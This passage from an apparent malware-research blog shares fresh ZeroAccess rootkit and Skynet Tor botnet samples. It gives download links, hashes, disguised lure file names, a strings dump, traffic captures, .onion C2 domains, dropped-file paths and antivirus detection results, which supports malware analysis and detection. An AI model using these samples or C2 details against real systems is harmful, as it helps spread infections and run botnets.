TheHackerTrojan/Injector.zra20121222
TrendMicroTROJ_GEN.R21CDLF20121222
TrendMicro-HouseCallTROJ_GEN.R21CDLF20121222
VBA32TrojanSpy.Zbot.gmeq20121221
VIPRETrojan.Win32.Generic!BT20121222
* * * MERRY CHRISTMAS AND HAPPY NEW YEAR! * * *
December 24, 2012, 10:07 pm
Next ZeroAccess / Sirefef Rootkit - 5 fresh samples
Previous Dec 2012 Linux.Chapro - trojan Apache iframer
0
0
Image may be NSFW.
Clik here to view.
More presents to come, pa rum pum pum pum
rum pum pum pum, rum pum pum pum
ZEROACCESS / SIREFEF ROOTKIT - 5 FRESH SAMPLES
December 25, 2012, 11:02 pm
Next Dec. 2012 Skynet Tor botnet / Trojan.Tbot samples
Previous * * * Merry Christmas and Happy New Year! * * *
0
0
Image may be NSFW.
Clik here to view.Stocking stuffers.
ZeroAccess rootkit is far from new and exciting but but this is a fresh lot with
still active C2 servers.
Although the dropper is detected by at least half of AV engines, post infection
detection is another story. I tried Kaspersky TDSS Killer, Avast Rootkit utility
and RootRepeal without any success. I used Gmer and LordPE to carve out the
hidden file from the memory. You can use Redline or Volatility too.
You can download 5 files below together with pcaps from one of the files and the
file dumped from memory. It appears that free videos and apps names are used as
the lure in this case.
Download
Image may be NSFW.
Clik here to view.Download the 5 files below plus the file dumped from memory
Download 2 pcap files from 2 runs of A2611095F689FADFFD3068E0D4E3E7ED
File information
* 251a2c7eff890c58a9d9eda5b1391082160 KB622.exe_
* 1a12137bd701bd9ed607671ce1b7806a160 KBanimal-sex-free.avi.exe_
* 59b247f0266b107451104243261a7ecf159 KBFlashPlayer_11_4_update_for_Win.exe_
* 98a993d62d367682048ec70df109e7d8161 KBreadme.exe_
* a2611095f689fadffd3068e0d4e3e7ed160 KBZeroAccess_xxx-porn-movie.avi.exe_
A2611095F689FADFFD3068E0D4E3E7ED
Screenshots from A2611095F689FADFFD3068E0D4E3E7ED
Download 2 pcap files from 2 runs of A2611095F689FADFFD3068E0D4E3E7ED
hidden library - injected in Explorer.exe
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Strings from the dumped z binary
File: dumped.dll
MD5: fe756584b159fd24dc4b6a572917354c
Size: 73728
Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
RichK6
t#cP[LordPE]
SPC3
.text
`.rdata
@.data
RtlImageNtHeader
RtlImageDirectoryEntryToData
LdrProcessRelocationBlock
----------------------------------------------------snip------------------------------------------------------
RtlExitUserThread
wcslen
swprintf
LdrGetProcedureAddress
wcsrchr
wcscpy
wcscat
ZwOpenFile
RtlInitUnicodeString
ZwReadFile
ZwClose
ZwWriteFile
ZwOpenEvent
ZwQueryVolumeInformationFile
memcpy
RtlAppendUnicodeToString
RtlConvertSidToUnicodeString
ZwOpenProcessToken
ZwQueryInformationToken
ZwCreateEvent
LdrFindEntryForAddress
ZwCreateEventPair
ZwSetHighWaitLowEventPair
ZwWaitHighEventPair
ZwSetLowEventPair
memset
RtlInterlockedPushEntrySList
RtlInterlockedPopEntrySList
RtlNtStatusToDosError
ZwCreateSection
ZwMapViewOfSection
ZwUnmapViewOfSection
RtlTimeToSecondsSince1980
qsort
ZwQueryEaFile
ZwQueryDirectoryFile
wcstoul
ZwDeleteFile
ZwCreateFile
ZwSetEaFile
ZwSetInformationFile
RtlAddressInSectionTable
RtlComputeCrc32
ntdll.dll
VirtualAlloc
LoadLibraryA
EnterCriticalSection
LeaveCriticalSection
VirtualFree
LoadLibraryW
FreeLibrary
Sleep
SleepEx
InitializeCriticalSection
DeleteCriticalSection
GetProcAddress
DisableThreadLibraryCalls
CreateThread
CreateTimerQueueTimer
DeleteTimerQueueTimer
LocalAlloc
LocalFree
BindIoCompletionCallback
GetLastError
GetSystemTimeAsFileTime
KERNEL32.dll
MD5Init
MD5Update
MD5Final
CryptAcquireContextW
CryptImportKey
CryptGenRandom
CryptDestroyKey
CryptReleaseContext
CryptCreateHash
CryptSetHashParam
CryptVerifySignatureW
CryptDestroyHash
ADVAPI32.dll
AcceptEx
MSWSOCK.dll
WSASocketW
WSAIoctl
WSARecv
WSASend
WSASendTo
WSARecvFrom
WS2_32.dll
RtlUnwind
NtQueryVirtualMemory
t#cP
p2p.32.dll
DllGetClassObject
@S0j
@p0j
@p0j
T0j@
U0j@
0*0k0
1&101B1J1[1b1p1v1
2#2(2?2H2g2y2
2H3Q3m3s3
41484`4r4x4
546;6B6]6b6n6
7&757;7U7h7q7
8+888=8H8M8X8]8j8p8
9#90969@9J9P9W9^9e9j9o9
9F:M:T:Z:b:
;%;2;
=$=2=<=s= >q?{?
3*3s3~3R4m4z4
545Y5z5
6E6J6
6O7t7
9,9C9i9
9$:/:G:i:
;%;,;M;];
;3<: data-blogger-escaped-i="i" data-blogger-escaped-j="j"
data-blogger-escaped-z="z">q>
?.?>?P?^?p?
0(0:0F0W0h0
1#121R1
313R3Y3_3q3v3
4!4t4z4
5?5|5
9+9A9K9
;,;R;[;t;
<$<*<0 data-blogger-escaped-00080="00080" data-blogger-escaped-1.141="1.141"
data-blogger-escaped-6="6" data-blogger-escaped-al="al"
data-blogger-escaped-b="b" data-blogger-escaped-d0t0="d0t0"
data-blogger-escaped-ddev="ddev" data-blogger-escaped-h="h"
data-blogger-escaped-iy="iy" data-blogger-escaped-m="m"
data-blogger-escaped-ur="ur">2i1FQ
q'.C
)5Rb
!Q[#\
5L@0
5e{u
-~G5
iV:RE
Scwn=
/dq_
m|XK
vT{!
g]a%Ph
Z,Jn
gf[G:C0!
>Ze\#
b'fg
(m9/
"0Gk_
@Vc}X
J+[YR~m
Ol"`o
L*s~t6L
(-w^
RdHQ
is*X
Lclu)
[TRg"
k#lhK&
2)\a
N3?2t-%
}vX}
=0^FBO
Jfjo
hNHWF
Eub!
%h:A
Zn=p
#`N$
%JQ3
CVy\
n_"/?
AYQD
_pB0
@-S
WQ<6 data-blogger-escaped-3cbi="3cbi" data-blogger-escaped-fdrtg="fdrtg"
data-blogger-escaped-gj="gj" data-blogger-escaped-vb="e"
data-blogger-escaped-y="y">
Kz!81
)v L
X-vy
YgB\
\Y82aM"
==.yf
2z"-{
^guA
,~qw)
7z2F
-IR4j;z1|
>!Nh
OZWG
s&h!\
rKhi/
iVrOhi
7']lM
K64}
ivYi
|fpK
Jd$< 9CX? .t'TR O6qa |-De mTB` \BL\* m`Wo mB"XpH 2C|d X\,j /"JE VW>b
gP,.-
%m|SXG
aOBY
A`3"kr9 D
dRIT
PgBeb
~pi2C
USER32.dll
CreateWindowExW
InvalidateRgn
PostMessageW
UpdateWindow
SetTimer
IsIconic
GetSystemMetrics
GetClientRect
DrawIcon
EnableWindow
PostQuitMessage
SetWindowPos
MapDialogRect
KERNEL32.dll
GetVersionExW
SetUnhandledExceptionFilter
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetModuleHandleW
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
GetCommandLineA
SetHandleCount
GetStdHandle
GetFileType
GetStartupInfoA
HeapDestroy
HeapCreate
VirtualFree
GetModuleFileNameA
TerminateProcess
UnhandledExceptionFilter
GetACP
GetOEMCP
GetCPInfo
IsValidCodePage
HeapReAlloc
GetTimeZoneInformation
DebugBreak
OutputDebugStringA
WriteConsoleW
OutputDebugStringW
LCMapStringA
LCMapStringW
GetStringTypeA
OLEAUT32.dll
OleLoadPicture
DispGetIDsOfNames
SafeArrayAllocDescriptor
GetErrorInfo
SetErrorInfo
VariantClear
OleLoadPictureEx
ADVAPI32
RegQueryInfoKeyA
RegSetValueExA
RegOpenKeyExA
RegCreateKeyExA
RegCloseKey
RegDeleteValueA
RegDeleteKeyA
RegEnumKeyExA
SHLWAPI.dll
PathFindExtensionA
WIS_EX
O3b3~3
3;4$6
;9=~=)?
4>5L7
=6>S?s?
9.:q:
414S4
7H7j7
6?:l;
Unicode Strings:
---------------------------------------------------------------------------
\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D79}
\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D77}
\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D78}
%sU\%08x.@
S-1-5-18
\??\%sU
\??\%s@
\BaseNamedObjects\Restricted\{0C5AB9CD-2F90-6754-8374-21D4DAB28CC1}
shell32.dll
wbem\fastprox.dll
\systemroot
RECYCLER\
$Recycle.Bin\
\$%08x%04x%04x%02x%02x%02x%02x%02x%02x%02x%02x\
c:\windows\system32\z
????????.@
%08x.@
%08x.$
%08x.~
Microsoft Base Cryptographic Provider v1.0
Traffic
| <- data-blogger-escaped--="-"> | | Total |
| Frames Bytes | | Frames Bytes | | Frames Bytes |
172.16.253.130 <-> 81.17.26.187 50 46654 31 3711 81 50365
172.16.253.130 <-> 67.81.86.2 41 38700 30 1696 71 40396
172.16.253.255 <-> 172.16.253.1 57 10592 0 0 57 10592
172.16.253.130 <-> 50.22.196.70 8 1880 10 696 18 2576
194.165.17.3 <-> 172.16.253.130 10 620 0 0 10 620
172.16.253.130 <-> 66.85.130.234 0 0 9 558 9 558
172.16.253.130 <-> 8.8.8.8 4 463 4 296 8 759
224.0.0.22 <-> 172.16.253.130 7 378 0 0 7 378
217.16.132.181 <-> 172.16.253.130 3 174 3 1830 6 2004
172.16.253.130 <-> 24.177.187.254 2 1220 2 116 4 1336
172.16.253.130 <-> 90.230.66.250 2 1220 2 116 4 1336
172.16.253.130 <-> 68.3.172.252 2 1220 2 116 4 1336
172.16.253.130 <-> 68.39.227.12 2 1220 2 116 4 1336
172.16.253.130 <-> 98.192.218.116 2 1220 2 116 4 1336
172.16.253.130 <-> 85.137.174.6 2 1220 2 116 4 1336
201.211.32.247 <-> 172.16.253.130 2 116 2 1220 4 1336
211.7.72.252 <-> 172.16.253.130 1 58 3 1830 4 1888
172.16.253.130 <-> 71.205.240.248 2 1220 2 116 4 1336
222.147.143.23 <-> 172.16.253.130 2 116 2 1220 4 1336
172.16.253.130 <-> 66.31.49.90 2 1220 2 116 4 1336
180.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232
184.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232
190.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232
201.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232
212.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232
213.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232
172.16.253.130 <-> 71.254.253.254 0 0 4 232 4 232
172.16.253.130 <-> 87.254.253.254 0 0 4 232 4 232
172.16.253.130 <-> 88.254.253.254 0 0 4 232 4 232
172.16.253.130 <-> 115.254.253.254 0 0 4 232 4 232
172.16.253.130 <-> 135.254.253.254 0 0 4 232 4 232
180.254.253.254 <-> 172.16.253.130 4 232 0 0 4 232
190.254.253.254 <-> 172.16.253.130 4 232 0 0 4 232
172.16.253.130 <-> 122.108.42.3 2 1220 1 58 3 1278
172.16.253.130 <-> 77.38.241.250 2 1220 1 58 3 1278
172.16.253.130 <-> 24.192.219.246 0 0 3 174 3 174
187.24.70.8 <-> 172.16.253.130 1 58 2 660 3 718
172.16.253.130 <-> 24.62.58.244 1 610 2 116 3 726
239.255.255.250 <-> 172.16.253.130 3 525 0 0 3 525
173.217.207.244 <-> 172.16.253.130 1 58 1 610 2 668
187.37.221.247 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 77.239.75.251 1 190 1 58 2 248
174.6.201.58 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 96.37.24.59 1 610 1 58 2 668
172.16.253.130 <-> 74.134.198.91 1 610 1 58 2 668
217.122.27.18 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 67.249.162.249 1 610 1 58 2 668
172.16.253.130 <-> 149.169.251.240 1 610 1 58 2 668
172.16.253.130 <-> 79.119.48.248 1 610 1 58 2 668
213.238.99.54 <-> 172.16.253.130 1 58 1 610 2 668
190.18.75.10 <-> 172.16.253.130 1 58 1 610 2 668
174.5.212.39 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 72.185.161.253 1 610 1 58 2 668
172.16.253.130 <-> 76.10.148.252 1 610 1 58 2 668
172.16.253.130 <-> 121.88.136.25 1 610 1 58 2 668
190.188.23.234 <-> 172.16.253.130 1 58 1 610 2 668
181.46.99.30 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 24.251.155.31 1 610 1 58 2 668
216.212.30.6 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 68.227.164.2 1 610 1 58 2 668
221.31.86.14 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 50.89.229.3 1 610 1 58 2 668
172.16.253.130 <-> 24.8.220.1 1 610 1 58 2 668
172.16.253.130 <-> 76.85.130.1 1 610 1 58 2 668
201.242.155.52 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 68.97.69.21 1 610 1 58 2 668
172.16.253.130 <-> 78.210.148.146 1 610 1 58 2 668
172.16.253.130 <-> 132.239.127.98 1 610 1 58 2 668
172.16.253.130 <-> 74.197.22.12 1 610 1 58 2 668
172.16.253.130 <-> 71.86.90.31 1 610 1 58 2 668
172.16.253.130 <-> 82.130.176.36 1 610 1 58 2 668
172.16.253.130 <-> 71.75.94.251 1 610 1 58 2 668
184.63.10.2 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 68.198.104.16 1 610 1 58 2 668
172.16.253.130 <-> 68.63.59.19 1 610 1 58 2 668
172.16.253.130 <-> 72.208.52.19 1 610 1 58 2 668
172.16.253.130 <-> 74.88.223.17 1 610 1 58 2 668
172.16.253.130 <-> 74.78.96.3 1 610 1 58 2 668
172.16.253.130 <-> 62.83.76.8 1 610 1 58 2 668
172.16.253.130 <-> 24.189.56.15 1 610 1 58 2 668
172.16.253.130 <-> 72.9.76.230 1 610 1 58 2 668
172.16.253.130 <-> 37.61.145.4 1 610 1 58 2 668
172.16.253.130 <-> 114.42.77.245 1 610 1 58 2 668
186.95.53.23 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 98.244.14.31 1 610 1 58 2 668
172.16.253.130 <-> 50.138.151.250 1 610 1 58 2 668
172.16.253.130 <-> 83.166.29.245 1 610 1 58 2 668
172.16.253.130 <-> 97.82.141.252 1 610 1 58 2 668
172.16.253.130 <-> 74.210.227.231 1 610 1 58 2 668
190.183.66.239 <-> 172.16.253.130 2 116 0 0 2 116
172.16.253.130 <-> 83.155.101.250 1 610 1 58 2 668
172.16.253.130 <-> 67.171.167.239 1 610 1 58 2 668
172.16.253.130 <-> 98.226.151.245 1 610 1 58 2 668
172.16.253.130 <-> 78.136.84.249 1 610 1 58 2 668
187.11.74.251 <-> 172.16.253.130 1 58 1 330 2 388
172.16.253.130 <-> 98.15.165.19 1 610 1 58 2 668
172.16.253.130 <-> 83.250.104.244 1 610 1 58 2 668
172.16.253.130 <-> 66.25.254.251 1 610 1 58 2 668
172.16.253.130 <-> 75.108.175.6 1 610 1 58 2 668
200.83.116.254 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 67.86.22.250 1 610 1 58 2 668
172.16.253.130 <-> 85.219.65.249 1 610 1 58 2 668
172.16.253.130 <-> 93.129.51.17 1 610 1 58 2 668
172.16.253.130 <-> 50.82.72.7 1 610 1 58 2 668
172.16.253.130 <-> 84.22.46.10 1 610 1 58 2 668
172.16.253.130 <-> 68.3.136.248 1 610 1 58 2 668
172.16.253.130 <-> 42.2.8.26 1 610 1 58 2 668
172.16.253.130 <-> 74.50.161.16 1 610 1 58 2 668
172.16.253.130 <-> 92.36.232.253 1 610 1 58 2 668
172.16.253.130 <-> 67.242.141.7 1 610 1 58 2 668
172.16.253.130 <-> 68.97.192.245 1 610 1 58 2 668
172.16.253.130 <-> 76.179.132.243 1 610 1 58 2 668
172.16.253.130 <-> 109.91.69.10 1 610 1 58 2 668
172.16.253.130 <-> 72.228.143.4 1 610 1 58 2 668
172.16.253.130 <-> 24.122.95.248 1 610 1 58 2 668
172.16.253.130 <-> 71.230.164.254 1 610 1 58 2 668
172.16.253.130 <-> 88.156.158.252 1 610 1 58 2 668
184.155.119.6 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 92.245.80.12 1 610 1 58 2 668
172.16.253.130 <-> 75.74.147.252 1 610 1 58 2 668
172.16.253.130 <-> 75.178.72.213 1 610 1 58 2 668
172.16.253.130 <-> 24.50.88.235 1 610 1 58 2 668
172.16.253.130 <-> 68.200.221.136 1 610 1 58 2 668
201.82.178.48 <-> 172.16.253.130 1 58 1 610 2 668
201.213.33.102 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 68.230.14.194 1 610 1 58 2 668
172.16.253.130 <-> 66.75.24.66 1 610 1 58 2 668
172.16.253.130 <-> 50.149.21.3 1 610 1 58 2 668
172.16.253.130 <-> 69.244.161.47 1 610 1 58 2 668
172.16.253.130 <-> 68.50.37.55 1 610 1 58 2 668
172.16.253.130 <-> 75.109.4.31 1 610 1 58 2 668
217.29.105.122 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 71.142.137.30 1 610 1 58 2 668
189.47.43.134 <-> 172.16.253.130 1 58 1 610 2 668
172.16.253.130 <-> 96.54.179.14 1 610 1 58 2 668
172.16.253.130 <-> 65.55.21.20 1 90 1 90 2 180
172.16.253.254 <-> 172.16.253.130 0 0 2 684 2 684
255.255.255.255 <-> 0.0.0.0 2 697 0 0 2 697
209.33.87.124 <-> 172.16.253.130 1 58 0 0 1 58
172.16.253.130 <-> 66.67.35.253 0 0 1 58 1 58
172.16.253.130 <-> 66.103.121.14 0 0 1 58 1 58
172.16.253.130 <-> 76.209.55.86 0 0 1 58 1 58
181.164.33.60 <-> 172.16.253.130 1 58 0 0 1 58
172.16.253.130 <-> 75.72.214.254 0 0 1 58 1 58
172.16.253.130 <-> 95.234.193.232 0 0 1 58 1 58
209.188.69.239 <-> 172.16.253.130 1 58 0 0 1 58
172.16.253.130 <-> 114.42.103.2 0 0 1 58 1 58
172.16.253.130 <-> 69.113.243.26 0 0 1 58 1 58
172.16.253.130 <-> 46.42.233.237 0 0 1 58 1 58
172.16.253.130 <-> 170.51.113.2 0 0 1 58 1 58
172.16.253.130 <-> 65.181.33.2 0 0 1 58 1 58
172.16.253.130 <-> 31.147.118.11 0 0 1 58 1 58
189.100.56.246 <-> 172.16.253.130 1 58 0 0 1 58
172.16.253.130 <-> 80.198.94.247 0 0 1 58 1 58
172.16.253.130 <-> 41.200.172.238 0 0 1 58 1 58
172.16.253.130 <-> 42.72.147.237 0 0 1 58 1 58
184.41.210.243 <-> 172.16.253.130 1 58 0 0 1 58
172.16.253.130 <-> 108.35.221.6 0 0 1 58 1 58
172.16.253.130 <-> 96.20.100.20 0 0 1 58 1 58
172.16.253.130 <-> 93.114.195.25 0 0 1 58 1 58
189.68.39.1 <-> 172.16.253.130 1 58 0 0 1 58
172.16.253.130 <-> 92.86.70.249 0 0 1 58 1 58
190.108.27.11 <-> 172.16.253.130 1 58 0 0 1 58
184.6.88.20 <-> 172.16.253.130 1 58 0 0 1 58
205.204.22.110 <-> 172.16.253.130 1 58 0 0 1 58
172.16.253.130 <-> 24.247.237.237 0 0 1 58 1 58
172.16.253.130 <-> 76.20.50.19 0 0 1 58 1 58
172.16.253.130 <-> 91.242.217.247 0 0 1 62 1 62
172.16.253.130 <-> 4.2.2.2 0 0 1 76 1 76
=========================================================
Automatic scans
https://www.virustotal.com/file/984fb2e07de82bc4a228c715dd0790e45dc1d104f6a9b082da9a4cecc0e151b7/analysis/
SHA256:984fb2e07de82bc4a228c715dd0790e45dc1d104f6a9b082da9a4cecc0e151b7
SHA1:5842f0d4fe3f177f2bb06a2e5878da55f7d814c7
MD5:251a2c7eff890c58a9d9eda5b1391082
File size:160.5 KB ( 164352 bytes )
File name:vti-rescan
File type:Win32 EXE
Tags:peexe
Detection ratio:14 / 46
Analysis date: 2012-12-26 05:35:35 UTC ( 1 hour, 12 minutes ago )
AntiVirTR/Kazy.13106020121225
AvastWin32:ZAccess-NF [Trj]20121226
BitDefenderTrojan.Generic.KDZ.271420121226
DrWebTrojan.DownLoader7.4534220121226
ESET-NOD32a variant of Win32/Kryptik.AREI20121225
F-SecureTrojan.Generic.KDZ.271420121225
FortinetW32/Kryptik.ARCN!tr20121226
GDataTrojan.Generic.KDZ.271420121226
KasperskyBackdoor.Win32.ZAccess.apvo20121226
KingsoftWin32.Hack.ZAccess.ap.(kcloud)20121225
MalwarebytesRootkit.0Access20121226
MicrosoftTrojan:Win32/Sirefef.P20121226
TrendMicro-HouseCallTROJ_GEN.R47H1LP20121225
ViRobotBackdoor.Win32.A.ZAccess.164352.E20121226
https://www.virustotal.com/file/d9dfcc507d773bf76075eed8abbb61e54f03f5f920b5c348fd7a0bf5f7bab3dd/analysis/
SHA256:d9dfcc507d773bf76075eed8abbb61e54f03f5f920b5c348fd7a0bf5f7bab3dd
SHA1:56104a626101126eed10e65171a26e25b6e50712
MD5:1a12137bd701bd9ed607671ce1b7806a
File size:160.5 KB ( 164352 bytes )
File name:amateur_dog_sex_01.avi.exe
File type:Win32 EXE
Tags:peexe
Detection ratio:6 / 46
Analysis date: 2012-12-25 10:50:38 UTC ( 19 hours, 59 minutes ago )
BitDefenderGen:Variant.Kazy.13106020121225
F-SecureGen:Variant.Kazy.13106020121225
KasperskyBackdoor.Win32.ZAccess.apvo20121225
MalwarebytesRootkit.0Access20121225
TrendMicro-HouseCallTROJ_GEN.F47V122520121225
https://www.virustotal.com/file/13586ffeca632e34c5813dcce4729b20852db0c9fb3ae0b6319699c739f5be29/analysis/
SHA256:13586ffeca632e34c5813dcce4729b20852db0c9fb3ae0b6319699c739f5be29
SHA1:865cf7a7ff3dde0828e7764751d76c8df6291506
MD5:59b247f0266b107451104243261a7ecf
File size:159.5 KB ( 163328 bytes )
File name:animal-xxx-movie.avi.exe
File type:Win32 EXE
Tags:peexe
Detection ratio:13 / 46
Analysis date: 2012-12-25 19:00:57 UTC ( 11 hours, 50 minutes ago )
AhnLab-V3Backdoor/Win32.ZAccess20121225
AvastWin32:ZAccess-NF [Trj]20121226
BitDefenderTrojan.Generic.KD.81713820121225
DrWebTrojan.DownLoader7.4543720121226
ESET-NOD32a variant of Win32/Kryptik.AREI20121225
F-SecureTrojan.Generic.KD.81713820121225
FortinetW32/Kryptik.ARCN!tr20121225
GDataTrojan.Generic.KD.81713820121225
KasperskyBackdoor.Win32.ZAccess.apzt20121225
MalwarebytesRootkit.0Access20121225
McAfee-GW-Edition-20121225
MicrosoftTrojan:Win32/Meredrop20121226
MicroWorld-eScanTrojan.Generic.KD.81713820121225
TrendMicro-HouseCallTROJ_GEN.F47V122520121225
https://www.virustotal.com/file/ac263c2267892fc9995ad841fc649e2071f8626dcc0d2d27cbce4ab6cb54f4ca/analysis/
SHA256:ac263c2267892fc9995ad841fc649e2071f8626dcc0d2d27cbce4ab6cb54f4ca
SHA1:33395e02036526ef7c3ab05afb137c7af2bcd6df
MD5:98a993d62d367682048ec70df109e7d8
File size:161.0 KB ( 164864 bytes )
File name:vti-rescan
File type:Win32 EXE
Tags:peexe
Detection ratio:20 / 46
Analysis date: 2012-12-26 05:39:43 UTC ( 1 hour, 12 minutes ago )
AhnLab-V3Backdoor/Win32.ZAccess20121225
AntiVirTR/Rogue.kdz.2666.120121225
AvastWin32:ZAccess-NE [Trj]20121226
AVGBackDoor.Generic16.ZLB20121225
BitDefenderTrojan.Generic.KDZ.266620121226
ComodoUnclassifiedMalware20121226
DrWebTrojan.DownLoader7.4511020121226
ESET-NOD32a variant of Win32/Kryptik.AREI20121225
F-SecureTrojan.Generic.KDZ.266620121225
FortinetW32/ZAccess.APQP!tr.bdr20121226
GDataTrojan.Generic.KDZ.266620121226
KasperskyBackdoor.Win32.ZAccess.apqp20121226
KingsoftWin32.Malware.Generic.a.(kcloud)20121225
MalwarebytesRootkit.0Access20121226
McAfee-GW-Edition-20121226
MicrosoftTrojan:Win32/Sirefef.P20121226
nProtectTrojan.Generic.KDZ.266620121225
PandaSuspicious file20121225
TrendMicro-HouseCallTROJ_GEN.R47H1LP20121225
VIPRETrojan.Win32.Generic!BT20121226
ViRobotBackdoor.Win32.A.ZAccess.164864.L20121226
https://www.virustotal.com/file/71b38f041b4a4ae169c44e3aff412e527e1156f92c27f1340a8abe70a45bee10/analysis/
SHA256:71b38f041b4a4ae169c44e3aff412e527e1156f92c27f1340a8abe70a45bee10
SHA1:6d21fc25b9da49d746b2b7609a5efaed4d332e6a
MD5:a2611095f689fadffd3068e0d4e3e7ed
File size:160.0 KB ( 163840 bytes )
File name:amateur_dog_sex_01.avi.exe
File type:Win32 EXE
Tags:peexe
Detection ratio:14 / 45
Analysis date: 2012-12-26 00:19:54 UTC ( 6 hours, 35 minutes ago )
AvastWin32:ZAccess-NF [Trj]20121226
BitDefenderTrojan.Generic.KD.81721720121226
ComodoTrojWare.Win32.Trojan.Agent.Gen20121226
DrWebTrojan.DownLoader7.4552720121226
EmsisoftBackdoor.Win32.ZAccess (A)20121226
FortinetW32/Kryptik.ARCN!tr20121226
GDataTrojan.Generic.KD.81721720121226
IkarusBackdoor.Win32.ZAccess20121226
KasperskyBackdoor.Win32.ZAccess.aqep20121226
KingsoftWin32.Malware.Generic.a.(kcloud)20121225
MalwarebytesRootkit.0Access20121226
McAfee-GW-Edition-20121226
MicroWorld-eScanTrojan.Generic.KD.81721720121226
SUPERAntiSpyware-20121224
SymantecWS.Reputation.120121226
TrendMicro-HouseCallTROJ_GEN.RFFH1LQ20121226
DEC. 2012 SKYNET TOR BOTNET / TROJAN.TBOT SAMPLES
December 26, 2012, 10:39 pm
Next Dec 2012 Batchwiper Samples
Previous ZeroAccess / Sirefef Rootkit - 5 fresh samples
0
0
Image may be NSFW.
Clik here to view.
Here are 7 binaries for Skynet Tor botnet aka Trojan.Tbot. Claudio's analysis
is wonderfully detailed, I just added pcaps and a few words in the description
Read more here:
Rapid7. Claudio Guarnieri. Skynet, a Tor-powered botnet straight from Reddit
Files
2E1814CCCF0C3BB2CC32E0A0671C0891 17.1 MB Coldplay-Live_2012-2012-BriBerY.exe_
5375fb5e867680ffb8e72d29db9abbd5 15
MB FileMaker_Server_Advanced_v12.0.1_MULTiLANGUAGE-CYGiSO.exe_
A0552D1BC1A4897141CFA56F75C04857 10
MB SpeedCommander.v14.40.Incl.Keygen-MESMERiZE.exe_
191B26BAFDF58397088C88A1B3BAC5A6 14.9 MB tor.exe_
519ED597B22D46EF8029C0720206E9D5 14.8
MB UEStudio.v12.20.0.1002.Incl.Keygen-MESMERiZE.exe_
23AAB9C1C462F3FDFDDD98181E963230 14.9 MB ysahu.ex_
fc7c3e087789824f34a9309da2388ce5 11.3
MB Z.wie.Zorro.S01E03.Der.Brandstifter.GERMAN.ANiME.FS.DVDRip.XViD-aWake.exe_
The files are very large but contain no video or other entertainment material,
just are padded with zeros.
Download
Image may be NSFW.
Clik here to view. Download all 7 files above Email me if you need the
password
Download all the created / dropped files for 2E1814CCCF0C3BB2CC32E0A0671C0891
available pcaps -- Download (no password)
4.08 MBtbot_2E1814CCCF0C3BB2CC32E0A0671C0891.pcap
3.24 MBtbot_23AAB9C1C462F3FDFDDD98181E963230.pcap
7.55 MBtbot_191B26BAFDF58397088C88A1B3BAC5A6.pcap
5.19 MBtbot_5375FB5E867680FFB8E72D29DB9ABBD5.pcap
3.97 MBtbot_A0552D1BC1A4897141CFA56F75C04857.pcap
7.43 MBtbot_FC7C3E087789824F34A9309DA2388CE5.pcap
File description
Domains for each sample
191B26BAFDF58397088C88A1B3BAC5A6 4kijo4rr4b6p6uv5.onion
23AAB9C1C462F3FDFDDD98181E963230 jtjoxo3uo3mh35kw.onion
2E1814CCCF0C3BB2CC32E0A0671C0891 c24dsyw5qwcbohtv.onion
519ED597B22D46EF8029C0720206E9D5 465z2el27gv4ls74.onion
5375FB5E867680FFB8E72D29DB9ABBD5 jnc6zswe3w6siqn2.onion
A0552D1BC1A4897141CFA56F75C04857 blm6o2rzv4ucdq4m.onion
FC7C3E087789824F34A9309DA2388CE5 enklhhn44mk2s6rc.onion
Active Connections
Proto Local Address Foreign Address State PID
TCP 127.0.0.1:2064 127.0.0.1:2065 ESTABLISHED 2376
[IEXPLORE.EXE]
TCP 127.0.0.1:2065 127.0.0.1:2064 ESTABLISHED 2376
[IEXPLORE.EXE]
TCP 127.0.0.1:2069 127.0.0.1:9050 ESTABLISHED 2860
[IEXPLORE.EXE]
TCP 127.0.0.1:9050 127.0.0.1:2069 ESTABLISHED 2376
[IEXPLORE.EXE]
TCP 172.16.253.130:2100 204.45.139.123:443 ESTABLISHED 2376
[IEXPLORE.EXE]
TCP 172.16.253.130:2103 82.96.35.6:443 ESTABLISHED 2376
[IEXPLORE.EXE]
TCP 172.16.253.130:2104 109.105.109.163:44945 ESTABLISHED 2376
[IEXPLORE.EXE]
TCP 127.0.0.1:2147 127.0.0.1:42349 CLOSE_WAIT 1592
[Explorer.EXE]
File changes
Red - << old, classic, pre-Citadel Zeus
Blue - << tbot
%USERPROFILE%\Application Data\Microsoft\Address Book\Laura.wab
%USERPROFILE%\Application Data\Microsoft\Address Book\Laura.wab~
%USERPROFILE%\Application Data\Kynir\tonob.exe < copy of the original dropper
%USERPROFILE%\Application Data\tor\cached-certs
%USERPROFILE%\Application Data\tor\cached-consensus
%USERPROFILE%\Application Data\tor\cached-descriptors
%USERPROFILE%\Application Data\tor\cached-descriptors.new
%USERPROFILE%\Application Data\tor\hidden_service\hostname
%USERPROFILE%\Application Data\tor\hidden_service\private_key
